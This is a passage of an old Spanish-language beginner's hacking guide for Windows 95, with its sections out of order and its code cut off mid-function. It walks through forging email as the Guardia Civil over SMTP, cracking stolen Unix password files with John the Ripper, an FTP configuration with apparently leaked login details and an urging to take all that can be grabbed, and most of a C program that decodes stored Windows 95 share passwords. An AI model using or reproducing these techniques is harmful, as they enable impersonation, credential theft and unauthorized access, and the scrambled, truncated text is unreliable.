mail from:gc.uco@mad.servicom.es <- ponemos de donde viene. El servidor nos contesta: 250 ... Sender Okay Ahora escribimos: rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos. El servidor nos contesta: 250 ... Recipiant Okay Ahora escribimos: data El servidor nos contesta: 354 Enter mail, end with "." on a line by itself Ahora escribimos: To: nob_ody@xxxxxxxx.com From: gc.uco@mad.servicom.es Subject: Te querremos!! Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te querremos fichar para el departamento. Direccion General de la Guardia Civil . <- para terminar el mail. El servidor nos contesta: 250 Mail accepted Ahora escribimos: quit <- ya esta todo listo :) Pues ves como es realmente simple!! Pero antes de empezar a jugar con esta tecnica tenemos que asegurarnos que el servidor de mail no regrista nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet sobre servidores que permiten hacer esto. 4f. Cambiando El Entorno. Esta tecnica no es que sea propia del hacking ya que solo sirve para cambiar la pantalla de inicio o la de finalizar windows. Los logos de windows tienen un formato BMP 320X400 pero estan clamuflados en ficheros con extension SYS pero siguen siendo realmente BMP'S. El logo del principio de windows (ya sabes el de las nubes) lo podeis encontrar como: c:>logo.sys
Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo y grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestro grafico y si lo volvemos a quitar, usara el de siempre. El logo del final (cuando cierra windows) esta en el directorio windows y lo podemos encontrar como:
c:windows>logos.sys
Logicamente es obligatorio que los graficos que querramos sustituir tengan de tama¤o 320x400 y sean ficheros BMP'S. Conviene que les pongamos el atributo de ocultos, que esto se hace con el comando Attrib, por ejemplo:
c:windows>attrib +h logos.sys <- lo oculta. c:windows>attrib -h logos.sys <- lo hace visible. 4g. Finger. La utilidad Finger, muy usada en Unix, en realidad no esta disponible en Win95 pero como somos Hackers nosotros si que somos capaces desde Win95. Finger se utiliza para obtener informacion de un servidor. Puede parecer una tonteria pero es util, por ejemplo, podemos empezar a sacar los Login's de los usuarios y empezar a adivinar sus passwords, tambien podemos vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la ultima vez que estuvo, etc...) y asi muchas cosas. La verdad es que para usar el Finger usaremos cualquier navegador, IE o Netscape. Simplemete nos dirigimos a un url un poco especial, es un web que permite hacer Finger a cualquier host y nos deveulve los resultados. Esto se conoce como "Finger Gateway". El url del web es: http://www.hgp.med.umich.edu/cgi-bin/finger 4h. Whois. La utilidad Whois, al igual que Finger es muy comun en Unix y no esta disponible en Win95 pero comos somos asi de listos saldremos del apuro. Tambien sirve para pedir informacion de un servidor pero no el igual que Finger, ya que se diferencian en el tipo de informacion, el finger se suele utilizar mucho para buscar direcciones de correo mientras que el Whois, para averiguar informacion sobre un servidor en concreto. Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un host muy especial: c:>telnet whois.internic.net
Por supuesto Internic, una empresa privada norte ameriacana que se encarga de controlar los dominios de Internet, y podemos usar su base de datos para pedir informacion sobre un servidor.
Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_del_servidor" y nos sacara la informacion.
telnet InterNIC > whois aol.com
Connecting to the rs Database . . . . . .
Connected to the rs Database
America Online (AOL-DOM)
12100 Sunrise Valley Drive
Reston, Virginia 22091
USA
Domain Name: AOL.COM
Administrative Contact:
O'Donnell, David B (DBO3) PMDAtropos@AOL.COM
703/453-4255 (FAX) 703/453-4102
Technical Contact, Zone Contact:
America Online (AOL-NOC) trouble@aol.net
703-453-5862
Billing Contact:
Barrett, Joe (JB4302) BarrettJG@AOL.COM
703-453-4160 (FAX) 703-453-4001
Record last updated on 13-Mar-97.
Record created on 22-Jun-95.
Domain servers in listed order:
DNS-01.AOL.COM 152.163.199.42
DNS-02.AOL.COM 152.163.199.56
DNS-AOL.ANS.NET 198.83.210.28
Como vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y esto es lo que nos ha sacado Internic. Al final podemos ver los dominios asociados a AOL. Pues sencillo y muy util, el whois.
4i. Tracert.
Esta utilidad que si esta implementada en Win95, nos sirve para calcular el tiempo que tarda un paquete de un servidor hasta otro y ademas podemos saber por cuantos servidores pasa. Muy util para sacar posibles servidores victimas si nos llaman la atencion.
Para usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert, a secas y nos sacara el menu de opciones disponible.
c:>tracert
Usage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
Options:
-d Do not resolve addresses to hostnames.
-h maximum_hops Maximum number of hops to search for target.
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.
Pues como veis, no tiene ningun misterio las opciones del Tracert, por lo que ya aprendereis su uso con la experiencia. Ahora escribimos una direccion IP cuando invocamos al Tracert, de la siguente forma:
c:>tracert 198.83.210.28
Tracing route to dns-aol.ans.net [198.83.210.28]
over a maximum of 30 hops:
1 * * * Request timed out.
2 138 ms 145 ms 135 ms 204.134.78.201
3 212 ms 191 ms 181 ms glory-cyberport.nm.westnet.net [204.134.78.33]
4 166 ms 228 ms 189 ms enss365.nm.org [129.121.1.3]
5 148 ms 138 ms 177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45]
6 284 ms 296 ms 178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221]
7 298 ms 279 ms 277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]
8 238 ms 234 ms 263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18]
9 301 ms 257 ms 250 ms dns-aol.ans.net [198.83.210.28]
Trace complete.
Aqui podeis por todos lo sitios que ha pasado el paquete que hemos enviado al IP 198.83.210.28. Y asi podemos con todos los servidores de Internet.
5. Utilizacion De Tools.
En esta seccion os explicare diferentes tools que podeis usar para hacking, por supuesto hay que buscarlas por Internet, no pondre el url para encontrarlas, ya que a lo mejor cuando estas leyendo esta guia ya no existe, pero os dire como se llama el programa asi lo podras buscar ademas esto tambien te servira para que te espabiles y sepas buscar cosas por Internet.
Logicamente esta guia es para win95 y los programas que explicare seran para win95 pero tambien me veo obligado a explicar varias tools que no son de win95 propiamente sino de MS-DOS pero que son necesarias y ademas corren en modo MS-DOS de win95.
5a. Skamwerks lab version 1.1b
Este programa es un util herramienta que nos ayuda a crear de forma rapida virus macro, o sea para el Word. Tiene que estar instalado el Word para que este programa nos funcione.
Al ejecutar el programa nos aparecera una ventana con 2 botones los caules son las 2 opciones que podemos escoger "Virii Wizard" o "Advanced Users".
El "virii Wizard" es la opcion, si no sabemos muy bien como crear un virus de macro ya que nos moveremos por varios menus y crearemos un virus de forma rapida y facilmente. La otra opcion, "Advanced Users" es para aquellos que sepan de Word Basic, el lenguaje de programacion del Word, ya que podemos meter codigo Word basic directamente y asi crear un virus a nuestro gusto.
Como este no es un curso sobre virus, no me voy a enrollar sobre la utilizacion exacta del programa. En mi opinion es un buen programa, en ingles :) programado en C++.
5b. WaReZ! Version 95.12.31
Este programa es un cliente FTP que muestra los directorios ocultos en un servidor, util si nos metemos en algun sitio sospechoso. Como ya es costumbre para que nos funcione tenemos que tener instalado el WINSOCK.DLL correctamente.
Al igual que antes tampoco hay que explicar mucho sobre este programa ya que su Interface es igual que el cliente WS_FTP que suele ser muy familiar para todos, por lo que no encontraremos mucha dificultad en su manejo.
5c. John the ripper v1.4.
Esta magnifica tool no es propiamente de win95 pero seria un pecado no hablar de ella, cuando corre sobre win95 de maravilla (bueno, dentro de lo que cabe :). John, como se le conoce, sirve para crackear un fichero unix de password (el conocido etc/passwd, como ya digo aprended algo de unix).
Cuando robemos un fichero passwd de un servidor, lo que tenemos que hacer es usar el John para sacar cuentas, pero no solo basta esto sino tambien necesitamos un buen diccionario y una combinacion de suerte y paciencia.
Supongamos que ya tenemos todo (fichero passwd, John y un diccionario), entonces tenemos que abrir una ventana MS-DOS y llamar al John, si lo llamamos sin nigun parametro nos saldran un listado de opciones, esto seria asi:
c:>john
Usage: john [flags] [passwd files]
Flags:-pwfile:[,..] specify passwd file(s)
-wordfile: -stdin wordlist mode, read words from or stdin
-rules enable rules for wordlist mode
-incremental[:] incremental mode [using john.ini entry ]
-single single crack mode
-external: external mode, using john.ini entry
-restore[:] restore session [from ]
-makechars: make a charset, will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[,..] crack this (these) user(s) only
-shells:[!][,..] crack users with this (these) shell(s) only
-salts:[!] crack salts with at least accounts only
-lamesalts assume plaintext passwords were used as salts
-timeout: abort session after a period of minutes
-list list each word
-beep -quiet beep or don't beep when a password is found
-noname -nohash don't use memory for login names or hash tables
-des -md5 force DES or MD5 mode
Veis? :), y como siempre no explicare que es cada opcion os lo dejo para que jugueis vosotros solitos!. Ahora, ya podemos crackear el fichero, para ello escogermos la opcion "single", ya que el john no nos pedira un fichero de diccionario, si fuese el caso que no tenemos, ponemos:
c:>john -single passwd
Y el John se pondra a trabajar, cuando halla acabo creara un fichero llamado "John.pot" donde se almacenaran los passwords encriptados con su correspodiente passwords desencriptado (esta definicion no es del todo correcta pero es para que lo entendais) y ya tenemos unas cuentas de acceso al servidor.
Este metodo va bien para la primera pasado con el John pero luego conviene usar un diccionario y con el diccionario seria de la siguiente manera:
c:>john -wordfile:spain.txt passwd
El John seguiria el mismo proceso antes descrito, por supuesto si el fichero "John.pot" esta creado ya, les a¤adira los resultados obtenidos a este fichero, por cierto este fichero tiene atributo de solo lectura.
Pues aqui se acaba la explicacion del John, que seguro que ya aprendereis a manejar correctamente. Referente a los diccionarios hay varias herramientas que corren bajo MS-DOS que crean diccionarios o tambien podeis buscar por Internet ya que hay varios web's llenos de diccionarios.
5d. Gobbler v 2.1.
Volvemos a la carga con otro programa que no es del win95 propiamente, pero es un sniffer que podemos usar bajo win95 en una red Ethernet. Un Sniffer para aquellos que no sepan, es un programa que captura los paquetes que pasan por una red y asi se pueden conseguir logins, passowrds u otro tipo de informacion que querramos, logicamente si los paquetes estan encriptados, esto dificultara el proceso, ya que habra que desencriptarlos si se puede.
Como siempre abrimos una ventana y ejecutamos el programa de la siguiente manera:
c:>gobbler
Y se activara el programa y veremos una serie de ventanas, en este punto, pulsamos el y saldra una ventana con un menu. Ahora tenemos que configurar el programa para nuestra red, la verdad es que es muy sencillo de utilizar, con un poco de practica dominaremos este sniffer facilmente.
Como sugerencia conviene leer el fichero de documentacion que trae, ya que explica como configurar el programa.
5e. Modificando el WS_FTP.
El famoso cliente ftp WS_FTP, se le puede a¤adir un host remoto el cual esconde mucho software interesante. Esta opcion no esta por defecto, simplemente hay que a¤adir una lineas en el fichero "WS_FTP.ini". Tenemos que añadir, al principio del fichero:
[208.128.143.19]
HOST=24.48.3.45
UID=cmw
PWD=636E79
LMASK=
RMASK=
RETRIES=20
PASVMODE=0
COMMENT=
Simple, verdad? Pues ahora cuando le digamos al cliente que se diriga al host 208.128.143.19 (que no es la dirrecion real, pero da igual). Pues que os divertais con esta cuenta :) y coged todo lo que podais, porque a saber cuanto tiempo estara vigente.
5f. Sharepasswd.
Este programa desencripta el passorwd de win95. Esta en lenguaje C, como supongo todo el mundo tiene que tener un compilador en C y si no ya estas buscando uno, que hay muchos y gratis por Internet. No veo la necesidad de explicaros el programa ya que tambien incluyo la explicacion del autor la cual esta muy bien, logicamente.
/* This program takes an 'encrypted' Windows 95 share password and decrypts it
* Look at:
* HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionNetworkLanMan
* to find a machine's shares. Within the data for each share are two
* registry entries, Parm1enc and Parm2enc. Parm1enc is the "Full access"
* password. Parm2enc is the "Read only" password.
*
* David Ross 2/9/96
* snakey@cs.umd.edu
*
* Do not distribute this program for any commercial purpose without first
* contacting me for permission.
*
* DO NOT USE THIS PROGRAM FOR ILLEGAL OR UNETHICAL PURPOSES!
*
* A technical description of the 'code' can be found later on in this
* document.
*
* Oh yeah... a totally unsolicited self promotion here... If anyone has
* a job for a junior year Computer Science student for summer '96, please
* let me know! I'm familiar with Windows and Mac networking (especially
* involving TCP/IP), fluent in C and C++, and working on becoming a
* proficient Windows programmer.
*
*/
#include
#include
#define BUFFER 30
int DecodeCharOne(unsigned char *);
int DecodeCharTwo(unsigned char *);
int DecodeCharThree(unsigned char *);
int DecodeCharFour(unsigned char *);
int DecodeCharFive(unsigned char *);
int DecodeCharSix(unsigned char *);
int DecodeCharSeven(unsigned char *);
int DecodeCharEight(unsigned char *);
main() {
int i; /* Generic counter */
int eocc = 0; /* Records if there has been an error */
/* The following structure stores the encoded bytes. Decoded values
* replace the encoded values as the decoding process moves along
* The initial values show here are not used and are unimportant
*/
unsigned char mybytes[] = { 0x15, 0xba, 0x6d, 0x86, 0x73, 0x89, 0xf4, 0x4a };
unsigned short tempshort; /* Used as a go-between from sscanf() to
mybytes[] so unaligned data accesses
don't occur */
int goupto = 0; /* Records how many characters there are to be decoded */
/* The following code handles input */
char inpt[BUFFER];
char *inptptr;
printf("Input the byte code in hex (ex: 76 d5 09 e3): ");
fgets(inpt, BUFFER, stdin);
inptptr = strtok(inpt, " ");
if (inpt[0] != ' ')
while ((inptptr != NULL) && (goupto < 8)) {
sscanf(inptptr, "%hx", &tempshort);
mybytes[goupto++] = tempshort;
inptptr = strtok(NULL, " ");
}
/* Decode all the characters. I could have made this stop immediately
* after an error has been found, but it really doesn't matter
*/
if (!DecodeCharOne(&mybytes[0])) eocc = 1;
if (!DecodeCharTwo(&mybytes[1])) eocc = 1;
if (!DecodeCharThree(&mybytes[2])) eocc = 1;
if (!DecodeCharFour(&mybytes[3])) eocc = 1;
if (!DecodeCharFive(&mybytes[4])) eocc = 1;
if (!DecodeCharSix(&mybytes[5])) eocc = 1;
if (!DecodeCharSeven(&mybytes[6])) eocc = 1;
if (!DecodeCharEight(&mybytes[7])) eocc = 1;
/* If the password could be decoded, print it */
if (eocc) printf("The encrypted password is invalid. ");
else {
printf("The decoded password is: "");
for (i = 0; i < goupto; i++) printf("%c",mybytes[i]);
printf("" ");
}
} /* End of main() */
/*
* I will document this function, but not the seven other functions
* which decode the subsequent seven characters. All of these functions
* are essentially the same. Multiple functions are necessary though
* because each column of the password has a different set of encoding
* patterns.
*
* The following section will attempt to explain the encoding scheme
* for share passwords as stored in the Windows 95 registry. I will
* try to explain this as clearly as I can, however I really have no
* background in encryption. If you have any questions, please feel
* free to send them to me at snakey@cs.umd.edu.
*
* First off, share passwords can be anywhere from one character to
* eight. "Read only" passwords and "Full access" passwords both use
* the same encoding scheme, and so they both can be decoded by this
* program. There is a one-to-one relationship between the number of
* characters in a password and the number of bytes in the encoded
* password stored in the registry. In fact, each encoded byte directly
* corresponds to the letter in the corresponding column of the
* unencoded password! Ie: If I change a password "passwd" to "masswd",
* only the first byte of the encrypted password will change. Knowing
* this, it is easy to see that all that needs to be done to decode
* the password is to find a mapping from an encoded byte to a decoded
* letter. That's what this program does. Unfortunately, things get
* a little tricky because a letter in the first column of a password
* is encoded using a slightly different algorithm than a letter
* in the second column, and so on.
*
* There is another complexity which we do not really need to worry
* about to a great extent, but we still need to be aware of. Many
* characters, when entered into a password, map to the same encoded
* byte. The best example of this is that both 'A' and 'a' are the
* same as far as share passwords are concerned. There are numerous
* other examples of this, and this allows us to effectively limit the
* range of characters we need to be able to decode. The range of
* ASCII values we will have to be able to decode turns out to be
* from 32 to 159. ASCII values higher than 159 tend to map to
* encoded bytes which also represent more normal ASCII values. So
* if a user manages to create a password with high ASCII values
* in it, that password will still be decoded by this program.
* Although the decoded password won't look the same as the original,
* it will work just as well.
*
* With all of the preliminaries out of the way, I can now move on
* to describing the mapping from an encoded byte to it's corresponding
* ASCII value. I think the best way to describe this would be through
* a picture of exactly how the characters from 32 to 63 are mapped
* out in the code for the first letter in a password. This table goes
* beyond the 80 column format maintained in the rest of this document,
* but it is really the best solution. If the table below doesn't look
* right, load this file up in a text editor that supports greater than
* 80 columns.
*
* Encoded byte (hex) - 1F 1E 1D 1C 1B 1A 19 18 17 16 15 14 13 14 11 10
0F OE 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00
* ASCII value (decimal) - 42 43 40 41 46 47 44 45 34 35 32 33 38 39 36 37
58 59 56 57 62 63 60 61 50 51 48 49 54 55 52 53
* Pair # - |_6_| |_5_| |_8_| |_7_| |_2_| |_1_| |_4_| |_3_|
|14_| |13_| |16_| |15_| |10_| |_9_| |12_| |11_|
* Quad # - |__________2__________| |__________1__________|
|__________3__________| |__________4__________|
* 32 byte block # - |______________________________________________
1______________________________________________|
*
* The "Pair #", "Quad #", and "32 byte block #" rows each are there to
* make the general ordering of the code more visible. The first thing to
* note is that the range of encoded byte values runs from 00 to 1f. This
* will not always be the case for the first set of 32 characters. In
* fact, the next set of 32 characters (ASCII 64 to ASCII 95) is not in
* the range of 20 to 3f in encoded form. I never concerned myself with
* predicting exactly where each of the four 32 byte ranges are aligned
* within the range of 0 to 256. In my decoding scheme, I simply specify
* the location of the first character in a 32 byte block (which I have
* pre-determined via experimentation) and determine the locations of the
* rest of the characters in the block relative to the inital value. This
* amounts to a total of four hand-decoded characters for the entire code.
*
* From a starting point which is given (in this case the fact that ASCII
* 32 is encoded as 0x15), my decoding scheme follows a pattern that is
* probably already apparent to you if you have examined the above table
* closely. First, if the encoded byte number is odd, it simple subtracts
* one from this byte number to get the byte number of the encoded form of
* the subsequent character. This is much more simple than it sounds.
* As an example, given that the code for ASCII 32 is 0x15, the program
* knows that the code for ASCII 33 must be 0x14. The tricky part is that
* this is not always true for every code. Recall that there is a different
* coding scheme for each of the 8 columns in a password, and that the above
* table only describes the coding scheme for the first column. Other columns
* reverse this relationship between the two ASCII values of a certain pair.
*
* Pairs are grouped into units of four, appearing in a predefined pattern.
* In this case, the first pair (by first I mean the pair with the lowest
* set of ASCII values) is put in the second slot of a quad (which contains
* four pairs). The second pair is put in the first slot, the third is put
* in the fourth quad, and the fourth is put in the third quad. This changes
* depending on the specific code used (of the 8 possible).
*
* Quads also fill a block in the same manner, however the ordering is NOT
* necessarily the same as the way pairs fit into quads! As I described
* above, there are four blocks, and they fit into the entire range of
* 128 values just as pairs fit into quads and quads fit into blocks,
* via a pattern determined by whoever invented this encoding scheme. It
* is important to realize that the range of 128 possible encoded
* values can be anywhere within the range of 0 to 256. Ie: One block can
* be positioned from 0x00 to 0x1f, while another block in the same code
* can be positioned from 0xa0 to 0xbf.
*
* I realize that the above description is a bit complex, and it doesn't
* really cover much of _how_ my program decodes the the encoded values.
* If you honestly can't understand a word I've said, just go back to
* the table and really take a long look at it. Print it out, put it
* under your pillow when you go to sleep. Sooner or later the order
* of it all will dawn on you and you should be able to step through
* my code and see how it derives its answer, at least for the
* DecodeCharOne() routine. Seven other tables (which I have rough
* copies of here on notebook paper) were needed to come up with
* the seven other decoders for the seven other character places.
*
*/
int DecodeCharOne(unsigned char *mychar) {
int i = 0; /* Keeps track of the decoded character # minus 32 */
int cletter = 1; /* Sets the current letter of the 8 char quad */
int blockl1 = 1; /* Sets the current quad */
int blockl2 = 1; /* Sets the current 32 char block */
int retval = 1;
/* We are on this col of the table: */
unsigned char code = 0x15; /* The code for a space */
/* This is the main loop. It walks through each decoded character, finds
* its corresponding encoded value, and looks to see if that's the same as
* the encoded value we are looking for. If it is, we have found our
* decoded character!
*/
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code--;
cletter++;
break;
case 2:
code += 3;
cletter++;
break;
case 3:
code--;
cletter++;
break;
case 4:
code -= 5;
cletter++;
break;
case 5:
code--;
cletter++;
break;
case 6:
code+=3;
cletter++;
break;
case 7:
code--;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) { /* After we hit character number 8, we have */
case 1: /* to do a relative jump to the next quad */
code += 11;
blockl1++;
break;
case 2:
code -= 21;
blockl1++;
break;
case 3:
code += 11;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) { /* After we hit the last quad, we have to */
case 1: /* jump to the next 32 character block. */
code = 0x75;
blockl2++;
break;
case 2:
code = 0x55;
blockl2++;
break;
case 3:
code = 0xb5;
blockl2++;
break;
case 4:
code = 0x15;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharOne() */
int DecodeCharTwo(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0xba; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code++;
cletter++;
break;
case 2:
code -= 3;
cletter++;
break;
case 3:
code++;
cletter++;
break;
case 4:
code += 5;
cletter++;
break;
case 5:
code++;
cletter++;
break;
case 6:
code -= 3;
cletter++;
break;
case 7:
code++;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code -= 11;
blockl1++;
break;
case 2:
code -= 11;
blockl1++;
break;
case 3:
code -= 11;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) {
case 1:
code = 0xda;
blockl2++;
break;
case 2:
code = 0xfa;
blockl2++;
break;
case 3:
code = 0x1a;
blockl2++;
break;
case 4:
code = 0xba;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharTwo() */
int DecodeCharThree(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0x6d; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code--;
cletter++;
break;
case 2:
code += 3;
cletter++;
break;
case 3:
code--;
cletter++;
break;
case 4:
code -= 5;
cletter++;
break;
case 5:
code--;
cletter++;
break;
case 6:
code += 3;
cletter++;
break;
case 7:
code--;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code -= 5;
blockl1++;
break;
case 2:
code += 27;
blockl1++;
break;
case 3:
code -= 5;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) {
case 1:
code = 0x0d;
blockl2++;
break;
case 2:
code = 0x2d;
blockl2++;
break;
case 3:
code = 0xcd;
blockl2++;
break;
case 4:
code = 0x6d;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharThree() */
int DecodeCharFour(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0x86; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code++;
cletter++;
break;
case 2:
code -= 3;
cletter++;
break;
case 3:
code++;
cletter++;
break;
case 4:
code -= 3;
cletter++;
break;
case 5:
code++;
cletter++;
break;
case 6:
code -= 3;
cletter++;
break;
case 7:
code++;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code += 13;
blockl1++;
break;
case 2:
code += 13;
blockl1++;
break;
case 3:
code += 13;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) {
case 1:
code = 0xe6;
blockl2++;
break;
case 2:
code = 0xc6;
blockl2++;
break;
case 3:
code = 0x26;
blockl2++;
break;
case 4:
code = 0x86;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharFour() */
int DecodeCharFive(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0x73; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code--;
cletter++;
break;
case 2:
code--;
cletter++;
break;
case 3:
code--;
cletter++;
break;
case 4:
code += 7;
cletter++;
break;
case 5:
code--;
cletter++;
break;
case 6:
code--;
cletter++;
break;
case 7:
code--;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code += 7;
blockl1++;
break;
case 2:
code -= 25;
blockl1++;
break;
case 3:
code += 7;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) {
case 1:
code = 0x13;
blockl2++;
break;
case 2:
code = 0x33;
blockl2++;
break;
case 3:
code = 0x23;
blockl2++;
break;
case 4:
code = 0x73;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharFive() */
int DecodeCharSix(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0x89; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code--;
cletter++;
break;
case 2:
code += 3;
cletter++;
break;
case 3:
code--;
cletter++;
break;
case 4:
code += 3;
cletter++;
break;
case 5:
code--;
cletter++;
break;
case 6:
code += 3;
cletter++;
break;
case 7:
code--;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code -= 13;
blockl1++;
break;
case 2:
code += 19;
blockl1++;
break;
case 3:
code -= 13;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) {
case 1:
code = 0xe9;
blockl2++;
break;
case 2:
code = 0xc9;
blockl2++;
break;
case 3:
code = 0x29;
blockl2++;
break;
case 4:
code = 0x89;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharSix() */
int DecodeCharSeven(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0xf4; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code++;
cletter++;
break;
case 2:
code++;
cletter++;
break;
case 3:
code++;
cletter++;
break;
case 4:
code -= 7;
cletter++;
break;
case 5:
code++;
cletter++;
break;
case 6:
code++;
cletter++;
break;
case 7:
code++;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code += 9;
blockl1++;
break;
case 2:
code -= 23;
blockl1++;
break;
case 3:
code += 9;
Nota Del Autor: No me hago responsable de la mala utilizacion de la informacion aqui expuesta ya que tan solo es para fines didacticos.
Esta guia es de distribucion libre excepto para las instituciones gubernamentales que deberan abonar 2000 pts a alguna fundacion para apadrinar niños.
INDICE:
1 ......................... Que Es Esta Guia Exactamente ?
2 ......................... Descripcion General De Windows.
2a ....................... Seguridad En Windows.
3 ......................... Protocolo TCP/IP y Demas Historias.
3a ....................... Puertos.
3b ....................... Ftp.
3c ....................... Telnet.
4 ......................... Hacking Basico En Windows.
4a ....................... Phf.
4b ....................... Ftp.
4c ....................... Ping De La Muerte.
4d ....................... Recursos Compartidos.
4e ....................... Fake Mail Con El Telnet.
4f ....................... Cambiando El Entorno.
4g ....................... Finger.
4h ....................... Whois.
4i ....................... Tracert.
5 ......................... Utilizacion De Tools.
5a ....................... SkamWerks Lab version 1.1b.
5b ....................... WaReZ! Version 95.12.31.
5c ....................... John the Ripper v1.4.
5d ....................... Gobbler v 2.1.
5e ....................... Modificando el WS_FTP.
5f ....................... Sharepasswd.
5g ....................... Snadboy's Revelation v1.1.
5h ....................... Keylog95.
5i ....................... Glide.
5j ....................... Win95 AnonyMail v 1.0.
5k ....................... Hacker's Utility, V 1.02.
5l ....................... Haktek v1.1.
5m ....................... Claymore Brute Force.
6 ......................... Medidas De Seguridad.
6a ....................... Protegiendo Nuestro Ordenador.
6a1 ..................... Ataques Tipicos a Nuestro Windows.
6a2 ..................... Encriptacion De Nuestra Informacion.
6a3 ..................... Eliminar Informacion De Forma Segura.
6a4 ..................... Eliminacion De Virus.
6b ....................... Protegiendo Nuestras Acciones.
6b1 ..................... Borrando Nuestras Huellas.
6b2 ..................... Encriptando Nuestro Correo.
7 ......................... Sugerencias Para Un Mejor Hacking.
8 ......................... Obtener Informacion.
9 ......................... Despedida.
9a ....................... Agradecimientos.
1. Que Es Esta Guia Exactamente ?
Esta guia esta enfocado hacia todo aquel que quiere ser hacker pero no quiere aprender unix o no lo sabe manejar (grave error). Pues por esta razon esta guia esta enfocada a los usuarios de windows, principalmente los de win95. Por el contrario esta guia no se dedicara al NT o Unix, aunque por supuesto se hara referencia a estos sistemas sobre todo cuando son estos mismos Sistemas Operativos en los cuales se centraran nuestros actos, supuestamente legales :)
Todo esto que digo puede sonar tonterias y puedes p0ensar que en win95 no podras llegar a ser un gran hacker porque es necesario conocer unix, y estoy totalmente de acuerdo, pero solo pretendo dar una oportunidad para hacer sus pinitos a aquellos que solo saber usar win95, yo por mi parte aconsejo aprender unix por varias razones que no viene a cuento en esta guia.
Con esta guia te convertiras en un magnifico Hacker usando un sistema que no es propenso al hacking. Como es normal al usar win95 estaremos muy limitados en muchos aspectos pero podras aprender por ejemplo, algunos bug que podras usar en tu favor, la utilizacion de diversas herramientas hacker que no estan disponibles generalemente en win95 y ademas a usar los recursos que te ofrece Internet en tu favor, abreviando un poco tanta charla, llegaras a conocer la red de una forma diferente y a manejar win95 de forma distinta a lo conocido hasta ahora.
2. Descripcion General De Windows.
Como todos sabemos el windows95 es un popular sistema operativo de la casa Microsoft, el cual es conocido tanto por sus adepto ya que es muy sencillo y vistoso pero al igual tambien es muy conocido por su inseguridad en casi todos sus aspectos, ademas no ofrece tanta versativilidad como otros sistemas operativos. Por ejemplo este es el caso de su "Multitarea" la cual es virtual y no real, si quieres hacer la prueba pon en marcha el defrag y ejecuta otro programa :) y veras esa famosa Multitarea.
